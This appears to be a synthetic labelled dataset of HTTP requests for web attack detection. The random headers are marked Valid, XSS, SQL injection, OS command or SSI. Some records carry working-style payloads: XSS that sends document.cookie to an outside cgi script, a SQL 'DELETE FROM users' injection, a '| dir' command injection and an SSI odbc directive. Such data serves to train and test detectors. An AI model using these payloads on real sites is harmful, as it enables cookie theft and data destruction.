If-None-Match: "FvEbxsbsnXxQlAzMkiOP"
If-Range: Fri, 12 May 06 15:41:10 CET
Max-Forwards: 6025
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: a6te0 gehaiuaA=e0ls5enT
Range: 1933-
Referer: http://iuoi.it/ilzytede/O28N/roie/4ttr1un4/owTf7f.swf
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/9.0 (Windows; U; Win98 5.0; nm-et; rv:1.8.5) Gecko/66708255
UA-CPU: Sparc
UA-Disp: 9580,602,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 738x004
Via: nsn5/9.7 www.pmumeer.png, pic/2.5 www.r1ti.gif, 2.7 www.3ezirci.htm:2130
Transfer-Encoding: identity
Upgrade: silEs/6.4
Warning: 581 222.35.204.94 "rhuhssl" "Mon, 12 Feb 07 03:54:33 UTC"
X-Forwarded-For: 33.121.40.254
X-Serial-Number: 82627
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 2767
Start - Id: 13572
class: Valid
GET /teipstOKdcajhnFc/zaHasgSNotsrlocHorm/H1/XKu/rtfegnfhelcrhg/.TqdANdunionz/3d/egajdthetnwIca9iS0b/xwsepfes/mV73sDHtMy9.swf? HTTP/1.1
Host: 184.250.52.240:80
Connection: keep-alive
Accept: video/*;q=0.6, audio/basic, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tptnso-e0;q=0.9, pn-aa;q=0.2, 7-tdnurEe, m4kwH-u
Cache-Control: max-stale=68
Client-ip: 102.222.165.69
Cookie: gtsid7eFousqo4c=uXBi.kg;azenmr8roeseS=jnyi1te
Cookie2: $Version="66"
Date: Mon, 05 Dec 05 05:58:42 UTC
ETag: "cSbiOHT@3Ha-K@ansJj@"
Expect: 100-continue
From: rctr@uneqdrer.ch
If-Modified-Since: Sat, 24 Jul 04 09:33:28 UTC
If-Unmodified-Since: Fri, 20 Feb 09 06:43:09 CET
If-Match: *
If-None-Match: *
If-Range: "u1Njo0YWyiq9xEa"
Max-Forwards: 33
MIME-Version: 9.2
Pragma: fz='eaua'
Proxy-Authorization: Basic dGl1b3R2Om9hZWVvaVMy
Authorization: NTLM dGRjbG16dEowYzc5bDdEaUdUaW5EY25ycmF2NTRhSWg=
Range: -4
Referer: http://www.rlihesei.ch/9yriiRe.htm
TE: deflate,trailers,chunked;q=0.2
Trailer: TE
User-Agent: Mozilla/4.5 (Windows; U; Win 9x 7.8; ll-rw; rv:4.0.1) Gecko/28865735
UA-CPU: Sparc
UA-Disp: 871,7067,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 138x4900
Via: 5.1 140.111.238.51:755, 2.3 222.37.247.41
Transfer-Encoding: deflate
Upgrade: tihi9l/6.1, hyla/3.9, 4Coi/5.5, tE2c/8.6, strcfX/0.7
Warning: 895 161.24.16.234:902 "bO2a" 
X-Forwarded-For: 43.218.172.178
X-Serial-Number: 70032554284651
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13572
Start - Id: 15448
class: Valid
GET /s2/kGi0.@aiWxWiDaWZNXz/EentcjutarjaazeI8td/6lY/Tors/e22WhX.pl?todnnW4=shdau7&alI=051719377&@wYGUuHz.=t3Vga0x&emaselaimc=1817&Xrxxp_ApwhereEGAA=+passthruIo&e5ehiuICs=1637488&rwagn=2259412&usn5aneaEgslTe=tcozc%3Ce&rxNF-nunion=ieruictbonHu&l@h@U8=gndatshq8HijIct&hnuandihgt=3oepatucsp&fah=7toO HTTP/1.0
Host: www.ogYehtre.fr:80
Connection: close
Accept: video/*;q=0.4
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 65.154.148.4
Cookie: zEn_z0JcyEi=6oPeosfpaeodteyl;iotsevv6ceAqc=bg7lFXnMKX0I;xpul8essrene=hqt
Cookie2: $Version="3"
Date: Fri, 01 Aug 08 23:30:11 CET
ETag: "B838Jk6u.UI@-Bc25aXp"
Expect: 100-continue
From: hreEo@mhtthLrava.org
If-Modified-Since: Tue, 24 Aug 04 18:10:07 CET
If-Unmodified-Since: Wed, 27 May 09 20:31:06 CET
If-Match: "SE4mh2p3P5SdQV7cj4"
If-None-Match: "-YU@caCXz6X2XzGIFn"
If-Range: Tue, 28 Nov 06 18:04:30 CET
Max-Forwards: 6132
MIME-Version: 1.7
Pragma: e='l2thyis'
Proxy-Authorization: Digest response="3f8D97bD7f0c87B1FD9E8dA3BC924866"
Authorization: Digest response="441FF1B50B0A147feB05cde0BBD4fc9a"
Range: 4188-,1306-94985
Referer: /awrtz/5etct7/2reohs/ruoa/8ore.php3
TE: trailers,deflate;q=0.5,chunked;q=0.7
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.4 (X11; U; Solaris 3.7; C5-ul; rv:3.4.1) Gecko/62952211
UA-CPU: PowerPC
UA-Disp: 0411,934,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 8272x2964
Via: 3.1 www.rnLao.jpg, FTP/4.9 26.125.89.198
Transfer-Encoding: gzip
Upgrade: oaai/4.0, e9n6fi/8.4, Gqhe/6.6, n3iid/9.5, y6n9/2.9
Warning: 865 www.btsmfeds.js "eterOr" 
X-Forwarded-For: 23.106.63.82
X-Serial-Number: 5314267
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 15448
Start - Id: 46842
class: XSS
PUT /phGxZSMIkSiUZeM/cx38J/ozBDd/oafvxRetvzh6/axeUashntcrtAtsdaue/fdppuincahadgNU/eUFO@D.HZdojG_8G7dn/DQFpositionScmd17x5On/eQlPN_G0dyV/yg-tUUiXe/wgmvu0ttneev/an0TJO.cxeE9.htm? HTTP/1.0
Content-Length: 229
Content-Language: eerartO,Lt
Content-Encoding: compress
Content-Location: http://tdon.uk/oib5dh/tixdpi5/ntlEt6/ehoitmNc.cfm
Content-MD5: Nm1vcm9hYWFlZWlnaWF0dA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 20 Mar 08 11:21:47 CET
Last-Modified: Wed, 13 Dec 06 14:47:41 GMT
Host: 152.85.213.210
Connection: nnif
Accept: */*
Accept-Charset: koi8-r;q=0.4, iso-8859-8-i;q=0.8, x-mac-japanese
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 220.1.146.36
Cookie: ykcayt7t=eliiS1DF0XO;hul=wuAd1Z9EeQM;IwhereTHservicesMC40=txraceejw9dx3ia0s;9Es=3lfLmen3ctt
Cookie2: $Version="455"
Date: Fri, 22 Jun 07 09:58:05 UTC
ETag: "jzY25ePpsai@EB.S_"
Expect: 100-continue
From: fassgdh4@tikal0.com
If-Modified-Since: Fri, 03 Nov 06 12:49:41 UTC
If-Unmodified-Since: Tue, 07 Aug 07 08:24:33 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="5iwrlmu"
Authorization: Basic ZGdyZ3ZmcTpzZ2x0bQ==
Range: -85
Referer: http://www.Emlpu0v.be/erpsvn.cgi
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: d9tcuk0ispmsanssee
UA-CPU: Sparc
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: 7.7 www.cstar.shtml, mni8g/7.7 255.12.70.104, HTTP/5.1 www.20cIjr.css
Transfer-Encoding: compress
Upgrade: ccSen/7.1
Warning: 515 www.wruorr.jpg "seuttb" 
X-Forwarded-For: 67.114.213.31
X-Serial-Number: 072274181665
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

AlNrjfptat=te@XWONRr_&b8erboe1estlto=<iframe    src    =" vbscript:[document.location.replace   ('http://www.te.com/cgi-bin/ande.cgi'+document.cookie);]     "   >&oj=2290710&jtrrto=ecftI@

End - Id: 46842
Start - Id: 24159
class: Valid
GET /d6dW.aeJl.nE/ea_7rOtjPRunw-@/sg3io.tiff?0selectEw3=75usZeic%25r0k&4rihircehA=vt&nuurres=3697&le2i7e=3&TstOOUumr=tdnY&srdionAfp=MetaewgysIet&jOhaennt=s%3F&te0a=25054&18rovfo=6896&b30e=slir&gtiokalats=sSctfe8&FlMrTeCsnsdl=nix HTTP/1.1
Host: 118.25.199.10
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-chinesetrad, euc-jp, windows-874;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: max-age=67336
Client-ip: 123.204.230.26
Cookie: TA9t4seSilNer=1260;IB@@iframe8JqjTV=250086;idunionJhWF8=2
Cookie2: $Version="45"
Date: Wed, 04 Aug 04 09:14:46 GMT
ETag: "s4tBYBnxgRfhumtRaIa"
Expect: 100-continue
From: neneodav@v5otnE.st
If-Modified-Since: Thu, 28 Sep 06 06:12:30 GMT
If-Unmodified-Since: Mon, 23 Aug 04 06:17:30 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 7.3
Pragma: tntsso=fe
Proxy-Authorization: eoczsc itSh=mlee
Authorization: sagzi arhoteu=ahqsel
Range: 392642-8535,09679-
Referer: /lnrdrit.exe
TE: deflate
Trailer: Host
User-Agent: hhtdi/4.9
UA-CPU: StrongARM
UA-Disp: 2537,365,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 978x997
Via: drrl/3.7 www.m4eu.js, 8.9 www.thsa.css, 0.1 244.39.117.117
Transfer-Encoding: gzip
Upgrade: bleion/1.0, dtdtte/9.5
Warning: 176 www.afsytan0.shtml:89321 "rtelrjklcea6e5" "Fri, 30 Oct 09 01:05:38 CET"
X-Forwarded-For: 91.102.253.43
X-Serial-Number: 14467935951
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24159
Start - Id: 47175
class: XSS
GET /i0LHr/TWfVYIunion0aiO/trkn6sEYpK9aDyhIFmst/seeulharfhnl4AiiotE/15xt/lP-nhR/0sedlrystgadf1oaxb6.jpg?tifqrmrwcoFqfr=rn72tis3znea8Ha&sEularTc=nDvJz&um=%3Cimg+++src+++%3D%22rierti++++%3E+++++%22++onmouseover+%3D++++%22%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.isniin.com%2Fcgi-bin%2Fmateildeil.cgi%27%2Bdocument.cookie%29%3B%5D%22++%3E&lrUpmr=77473&ooptonetezm=ikoau+irc%3Cbetween%40Rcwtmpj%3Fo&ouwak2n4InbrkIt=tsituoelIu&uao0G14rpi=ndrma8onA&sa7oaecelrfgco=9711834 HTTP/1.0
Host: 72.180.211.245:5907
Connection: iss9ea
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.4, x-mac-turkish
Accept-Encoding: *;q=0.7
Accept-Language: EoaH-et;q=0.4
Cache-Control: no-cache
Client-ip: 102.236.20.245
Cookie: eaei4cTn0oeve=643;etm6op9bu=2101234359;a1alsawtcoo=sX-;rln=339
Cookie2: $Version="142"
Date: Sat, 23 Dec 06 10:24:05 CET
ETag: "mosfK1Kq7WDVNdG"
Expect: bltUcf=Sn6ay
From: atrc@mosrloac8i.net
If-Modified-Since: Thu, 30 Oct 08 03:26:49 CET
If-Unmodified-Since: Fri, 14 Nov 08 23:34:28 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 23 Jul 09 10:32:21 UTC
Max-Forwards: 9
MIME-Version: 2.0
Pragma: moau99l=e
Proxy-Authorization: NTLM c1N0ZmdnbEhBT1RzZXhwZXBkdXQwdGJkbGV3ZW5lcjNyOQ==
Authorization: kpd4au brdgHnI=sBnete
Range: -016,1-,67332-47295
Referer: /rhmyeedi/bddToeop/ceed/ih7sos/IwsIyq.png
TE: trailers,deflate;q=0.9
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.6 (Machintosh; U; PPC Mac OS X 9.5; t3-od; rv:1.3.5) Gecko/38819836
UA-CPU: MIPS
UA-Disp: 934,693,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6020x621
Via: lben/7.2 www.u9eaCh.tiff:22602
Transfer-Encoding: oypiil
Upgrade: 7hadcl/7.9, 8tJSt/5.4, qlttea/4.8
Warning: 861 174.187.41.2 "rTsfbeu" 
X-Forwarded-For: 85.51.180.168
X-Serial-Number: 533969856895
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47175
Start - Id: 27401
class: Valid
GET /dRRgHFEO6pZye149/ipaB.css? HTTP/1.0
Host: www.afesTtna.ch
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-kr
Accept-Encoding: 
Accept-Language: bliiOr-dmStatd;q=0.2, itideh-reainl;q=0.2
Cache-Control: only-if-cached
Client-ip: 145.73.80.153
Cookie: eoes1zuN1mnr=tNal;ecOe8tzAwoa=fkGmQPTM53W2;usoroeNeragcb=er ;FPsystem3fsSallyHNf=kmooeyc;sUehDi3omia=En:ae>aidp=fa2dropftpgsfyboot.ini
Cookie2: $Version="26"
Date: Tue, 07 Jun 05 19:25:54 CET
ETag: "OA6LdaqSRCAjkeXw1Yp"
Expect: 100-continue
From: glqntj@hA8egh.fr
If-Modified-Since: Fri, 21 Dec 07 22:27:45 GMT
If-Unmodified-Since: Fri, 25 Sep 09 04:33:05 UTC
If-Match: "CPvOO72Cz7xZY4_"
If-None-Match: *
If-Range: "tpdt.Hmhgi6LhGfGQ"
Max-Forwards: 1953
MIME-Version: 8.4
Pragma: atloL='zaa5toi'
Proxy-Authorization: Basic ZmFpbXQ6ZXQxU3I=
Authorization: NTLM bzNkc2Zlc2UwZE1ubndkYkJvd3VKdHJyYWFvM083R2VyaTB0ZTd0Yw==
Range: 126073-82729,58-840514,56-
Referer: http://www.itylgs.fr/ltapIu.sh
TE: trailers,trailers,deflate
Trailer: Host
User-Agent: Mozilla/2.4 (compatible; ceewu; Mac OS X; adoar; eescsl2en)
UA-CPU: 68000
UA-Disp: 009,2103,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9698x542
Via: 1.5 www.e5woe.htm, 3.4 www.oNhimE.html
Transfer-Encoding: xemnl
Upgrade: Ut0et/2.4, riu/2.5, oFvi/8.5
Warning: 680 www.tdeh77g.gif "z1eLBiT0" 
X-Forwarded-For: 96.144.180.117
X-Serial-Number: 012150343166763006
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27401
Start - Id: 36668
class: OsCommanding
PUT /7nEovO5BwatJk2-/aeOm.js? HTTP/1.0
Content-Length: 169
Content-Language: h5eo,aone
Content-Encoding: compress
Content-Type: application/x-www-form-urlencoded
Host: www.pq4teee.st:80
Connection: nRualbd
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 27.9.8.141  |    dir
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 121.9.77.70
Date: Wed, 28 May 08 06:59:57 GMT
If-Modified-Since: Sun, 15 Nov 09 08:44:47 CET
If-Match: "buZRQVSMTdpXVWEc5"
Max-Forwards: 9
Referer: /I8ttqtn/tsiit2tf/eeitioe.conf
TE: trailers
User-Agent: yIa5qFhG0 http://www.hiei6v.de
UA-CPU: x86
UA-OS: FreeBSD
Upgrade: Oesoir/5.0, aaiq/2.9
Warning: 228 46.175.163.122 "6arAwer4rvegta" "Fri, 07 Jan 05 21:03:34 CET"

eUetoRndetSimrp=ydcyoadcS&ojrx=r &xhjil=Vec\er&dnieGiauyoseeak=795723588&w6W5=10165&y4o8qNB=eydn-iieohahdTsiCleu&zsn4Oee0oaGnr9o=8fwgetto&50moc=cbrbyJ&PHidPBG8=ralz'

End - Id: 36668
Start - Id: 42204
class: SqlInjection
GET /nolaitCacit/buqsul0eiaoe5Hmooo/feahreer/iirrdm2omse/oolnsognnlco6/earky7uoblrksil9/3tMbwuuC/l@Bjmail_bB11m05e.aspx?slezzp=%3Ept%29n+n&uehtseTdy=5&1Asmt6eosr=tpwTa3rahy&nilhcoebR2w6=goteqhri&uetUiow=uFrociti-gtetiiaccess_logmIL3&satao=135&n15lrifjos=eosghtgaXe%27%29%3BDELETEFROMusersWHEREupper%28username%29+++%3D++++upper%28++%27admin&elOoetoloslqw=br8Vdigat5e3rUio HTTP/1.1
Host: 103.65.45.228
Connection: laheedd
Accept: */*
Accept-Charset: big5, cp-936
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 189.179.253.21
Cookie: ftecraSp=:hodrdrop eud\snd
Cookie2: $Version="83"
Date: Tue, 07 Oct 08 08:54:24 CET
ETag: W/"fn7bj1SqWuSxNn3lC"
Expect: 100-continue
From: bp6teizi@aeuaCwa.uk
If-Modified-Since: Thu, 25 Mar 10 05:07:50 CET
If-Unmodified-Since: Tue, 20 Sep 05 18:30:43 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM ZE5lVG9hbGlzZWw1ZGh4b3RxYXlvZHRyMHRxZWl3bGNObmg=
Authorization: eewl hlzcoi=4weu
Range: 8473-303,-227666,770360-
Referer: http://www.agui.biz/l9errcrp/nnrcfrh/cnelungo.asmx
TE: chunked;q=0.2,chunked;q=0.2,trailers
Trailer: User-Agent
User-Agent: Mozilla/4.1 (Windows; U; Windows NT 7.7; ee-8e; rv:0.5.5) Gecko/16018015
UA-CPU: StrongARM
UA-Disp: 764,0830,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 451x3766
Via: 4.6 126.11.149.103, qonc/4.8 www.lLv4sa.tiff
Transfer-Encoding: gzip
Upgrade: srir/8.4
Warning: 838 www.hoxvXtnu.htm "NewsildyiOe" 
X-Forwarded-For: 174.56.222.47
X-Serial-Number: 11545231207
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42204
Start - Id: 7285
class: Valid
POST /MnceRhrpVx/04gjsW_eqSqxJ/y5eyo/rr.css? HTTP/1.1
Content-Length: 273
Content-Language: dhs5mlna
Content-Encoding: identity
Content-Location: /msxoldrt/54hrjd.exe
Content-MD5: N2gwM29ybzVub3VtdGQ5bg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 07 Apr 06 22:45:18 CET
Last-Modified: Fri, 07 Oct 05 09:25:28 UTC
Host: www.al5gcrf.uk
Connection: close
Accept: application/*;q=0.7
Accept-Charset: windows-874
Accept-Encoding: 
Accept-Language: i-o6t, m-Ydtuee, ae-cs
Cache-Control: no-transform
Client-ip: 180.159.10.206
Cookie: chgroUs1v=ke>inufas=;wowxTxRjE=~glneeszpaqee;ssttYs=426197
Cookie2: $Version="2"
Date: Tue, 17 Nov 09 01:38:40 UTC
ETag: W/"a_P_.ceqKKH6kOr8J"
Expect: 100-continue
From: aleOu@hlmCevz4na.org
If-Modified-Since: Tue, 02 Mar 10 04:04:02 CET
If-Unmodified-Since: Tue, 01 May 07 20:07:19 GMT
If-Match: *
If-None-Match: "dehlTL@E-7uMZSOV"
If-Range: "4SvR_YhE2JOozr1"
Max-Forwards: 239
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Eirtt hmefn=eehsteiw
Authorization: NTLM ZVg1cmxJb01zQWpobm90aWpkaWFleWFjNDltUm10dGlzaGxhc3RpNm45dW5t
Range: -4
Referer: http://ns4fot.gov/eeo0in.sh
TE: trailers,deflate,trailers
Trailer: Connection
User-Agent: Mozilla/7.6 (compatible; Konqueror/0.2; Win 9x; yLiaf)
UA-CPU: 68000
UA-Disp: 6402,121,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 400x2511
Via: 4.3 34.62.134.157, 2.9 36.12.162.36, FTP/7.2 www.prefae.png
Transfer-Encoding: gzip
Upgrade: rdt/2.6, bbnoh/3.2, 1lceaS/9.8
Warning: 924 www.rtAils.htm:75 "ahvM8nsnku" 
X-Forwarded-For: 51.142.208.191
X-Serial-Number: 35067124458
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

gogevglaN5osn=ln&lriealuoaXegtHt=7133&egbbeaN9ad=wcieeiTch&ehedOo7gtXsphr=68037913&abjr=dslomhhrwithlaid&qerehni=sI3.B3&hut8tr=68&hft7risimveea=t5cawasspm&0i=nNRte&aaascs4nRm3lL=1&l6rr=2083568&ymgu9leseed=mFoMDHBOXpV&s9tgloS=5189&eRsTcgv=cvM&mLZnph-includeJL=lioctrhcew5b0n

End - Id: 7285
Start - Id: 34499
class: Valid
PUT /8ZOCcZCFbOwhm9fHQZ/iH/9Sroplho/zYtHoI/es.lIV/dSjwYmB7ibinKf/tnorlehsjUthrwmriesi/ueYeeo8hskfp/5shfmzNph8ee9sv0aiei/osW.aspx? HTTP/1.1
Content-Length: 36
Content-Language: 1ae,lbaddei
Content-Encoding: identity
Content-Location: http://www.blsnm.it/eive8dyt/aofmsoi/nebsO.php3
Content-MD5: dEVyOXdhdDJuNXRuaW53eA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 05 Mar 09 18:17:07 CET
Last-Modified: Fri, 12 May 06 08:34:40 UTC
Host: www.iurdlme.net
Connection: keep-alive
Accept: text/plain, text/xml;q=0.8
Accept-Charset: iso-2022-jp, euc-cn;q=0.4, iso-2022-kr, euc-kr
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-age=2
Client-ip: 96.49.197.35
Cookie: ee=66288;fwBiw7=778
Cookie2: $Version="08"
Date: Tue, 16 Dec 08 24:08:33 CET
ETag: W/"zXkqap1UykJ3qZ_m7Y"
Expect: ndneT1nR=tcnasehS
From: doesa@0psfre.gov
If-Modified-Since: Thu, 29 Jan 09 01:37:39 CET
If-Unmodified-Since: Sun, 16 Oct 05 16:17:35 CET
If-Match: "0keeEj.5cgzsMjxxwv"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: 8bnrqi t6sehpaY=rejt
Authorization: NTLM UGV4YnNxYWlhb2UydGEwcTlvb2lyRWV1NW1lZmZyb2FkcDg=
Range: 003-49,-300,-23
Referer: /bns2muga/ias5p/gsahi/tLipfH/Fmtp.php3
TE: chunked
Trailer: TE
User-Agent: Mozilla/8.4 (Windows; U; Win98 2.7; dy-pq; rv:7.6.0) Gecko/33546380
UA-CPU: MIPS
UA-Disp: 3627,6324,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 7089x0052
Via: wezows/2.6 133.118.222.69, bCtoK2/3.3 128.213.113.55:28, HTTP/0.7 162.43.32.107
Transfer-Encoding: viebe; idtg=se0s9nT
Upgrade: rom/3.2, dam9/0.8, 7tem/6.5, z0g/8.9, amnc/6.5
Warning: 120 105.92.89.208:5 "xubtas3ei" "Wed, 09 Apr 08 24:59:15 GMT"
X-Forwarded-For: 63.206.208.126
X-Serial-Number: 16107825761
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~

zoaDtatitbnhrrj=|httpsseds:aney6

End - Id: 34499
Start - Id: 40800
class: SSI
GET /bCCltmpd/-cO/oeawCtt/GshomeFRH./14/e5AIPJhnGDlfD.png?0_-p3H=%3C%21--++%23odbc+statement+++%3D+++%22select+++++o3eunael%2C++sisitre%2C+++++ny+++++from+gahj1++++order++by++1%2C+++99%2C++3%22++--%3E&9@HJ=ftec&7UDD8E_z5Q=hatOylfout8ee8w&s68eOhair=ou_fNd5t HTTP/1.0
Host: 218.180.154.41:33
Connection: 2lwton
Accept: */*;q=0.3
Accept-Charset: us-ascii, iso-8859-3;q=0.8, iso-8859-1
Accept-Encoding: compress;q=0.8, identity
Accept-Language: *
Cache-Control: no-transform
Client-ip: 154.27.72.55
Cookie: iiemy=y
Cookie2: $Version="3"
Date: Mon, 23 Jun 08 13:54:47 GMT
ETag: W/"2Eih7blkHvtqIfGL"
Expect: 100-continue
From: iiljwdi@httr81j.de
If-Modified-Since: Sun, 17 Apr 05 13:09:46 GMT
If-Unmodified-Since: Thu, 26 May 05 19:18:42 CET
If-Match: *
If-None-Match: "TRbdkbt1jx-OYQg8UH0K"
If-Range: *
Max-Forwards: 3
MIME-Version: 8.4
Pragma: itipoo='taehhoi9'
Proxy-Authorization: Digest username="easT"
Authorization: Basic ZWlzd3RpOnJjVGp0bzhx
Range: -473515,10127-9,-129281
Referer: /atTlldhx/ux7NiS.rar
TE: trailers,trailers,trailers
Trailer: Range
User-Agent: Mozilla/6.8 (compatible; Konqueror/1.5; Windows NT; aTnieocv; tiio05iu3e)
UA-CPU: 68000
UA-Disp: 327,318,8
UA-OS: Win98
UA-Pixels: 8812x175
Via: FTP/5.9 58.191.224.182
Transfer-Encoding: HtRp; esaeps=i2ta2re
Upgrade: tNdwlL/6.5
Warning: 512 www.zgaaa4Nn.html "tnlssOrNs" 
X-Serial-Number: 17196143235816087076
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40800
Start - Id: 3121
class: Valid
GET /txM0oonUe/h-/gEiopashSAsD/N0body5/oAD.php4? HTTP/1.0
Host: www.iu3btw.gov
Connection: oiabsH
Accept: */*;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 53.57.134.175
Cookie: caeor=/  ;os=nieaa0zte = tnit&n\;nk-3XoONfii=4648;ttlt=rteq8m1AtMrA
Cookie2: $Version="631"
Date: Sat, 02 Jun 07 02:17:08 CET
ETag: W/"k1bDH-QRD6giy00AGJ0"
Expect: 100-continue
From: eead@01e8oq1.gov
If-Modified-Since: Wed, 25 May 05 11:16:01 GMT
If-Unmodified-Since: Sat, 17 Jan 09 03:55:19 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 620
MIME-Version: 9.9
Pragma: n='da'
Proxy-Authorization: Basic ZHZnZDo3c2F3YXM=
Authorization: Basic cnNsem5waTp1eXNs
Range: -6106,0309-,1-
Referer: /nngtt/mito/cbyhtr/srawifNh.jpg
TE: deflate;q=0.4,trailers,trailers
Trailer: Accept-Language
User-Agent: Reqedeosni (rMehuS21Tq; o5Q7oMWs)
UA-CPU: PowerPC
UA-Disp: 345,165,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 5219x775
Via: FTP/1.9 www.mfHi.css, 2.2 www.ireamne.shtml, 3.0 177.63.7.182
Transfer-Encoding: compress
Upgrade: n4c/0.0, pOx/3.9
Warning: 446 www.fikne.html "nqbsbldmuEl1E71nq1" 
X-Forwarded-For: 54.64.220.207
X-Serial-Number: 1722875
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3121
Start - Id: 27211
class: Valid
GET /tuW.MLmpxnFYhu9L/oaeHfeqdetsjn.swf?nciBC2UwgetlinkJR=6 HTTP/1.1
Host: 98.116.54.165:80
Connection: keep-alive
Accept: application/rtf;q=0.0, image/*
Accept-Charset: iso-8859-8;q=0.5, x-mac-arabic
Accept-Encoding: compress
Accept-Language: *
Cache-Control: max-age=41176
Client-ip: 243.192.18.149
Cookie: aueoM=child%s;zs6r=r9etermstyldoe;tx58tcqpha=sxe
Cookie2: $Version="883"
Date: Fri, 14 Jan 05 02:10:05 GMT
ETag: W/"uuyM-6FilYWqa@Bq"
Expect: sUpI=shahsoEh;teth0f1o=nebdm4
From: nseo2sh@tNat6ef8to.be
If-Modified-Since: Tue, 29 Jun 04 01:41:29 UTC
If-Unmodified-Since: Wed, 15 Sep 04 23:33:06 GMT
If-Match: "e5GpCMMH5mDEh41Z-ytr"
If-None-Match: "eh6wEa8hzaYWP.FITwdN"
If-Range: *
Max-Forwards: 881
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: NTLM bnRzbjVsZWhzbmVzcG1mZjZ0RWR0c2FlcXJyZVVzNXJlZWV2YWR1MXdv
Authorization: sIaieC zon1iAtz=slii6a4
Range: -6,-0
Referer: http://lFes.cz/Tift8elr/MnSl8dea/at4N.bin
TE: gzip,deflate;q=0.7,deflate
Trailer: If-Match
User-Agent: Mozilla/7.9 (Windows; U; Win98 4.3; 7t-ha; rv:7.3.7) Gecko/16157720
UA-CPU: MIPS
UA-Disp: 451,9242,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0571x6226
Via: FTP/2.2 www.tba1stfp.jpg
Transfer-Encoding: hnnby; hiue=ittsf
Upgrade: etani/8.7, cfAetN/7.0
Warning: 126 www.tttHrTrO.gif "d5Snbahld" 
X-Forwarded-For: 155.94.169.142
X-Serial-Number: 74622774860135514346
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27211
Start - Id: 25377
class: Valid
GET /noe/qb9etmjmithipt/_etcvvdscToXwa/ned/hdlQ2w6idqqos4Zyc14S/t7/eiSt7gtYawgWYPXVE/lMYLVkVYP2mPJzXRX9/dAcgnhteaeifisT0E.asp?Tla=418151&gutYwenkeelefe=aaceaosgseheulT4l&fNtNZatmojcttie=4p5om0u6azo2iroe&.zpassthruN=91&i9=4&9ohaxsDa=xp_9r&r5a4daou=%25o%5Cftpi%5B60it%25u2nf2&bAtnnn5r=3537&esgocaBtry=tin%7Cs%7Ctd&gbsolayros=i0vGrz.zOHA&cgehT=lto-mjUW HTTP/1.0
Host: www.eedsdRtuai.uk
Connection: jnoate
Accept: */*
Accept-Charset: iso-8859-8, x-mac-hebrew;q=0.0, windows-874;q=0.9, euc-jp, x-mac-korean;q=0.5
Accept-Encoding: compress;q=0.6, deflate
Accept-Language: *
Cache-Control: min-fresh=925
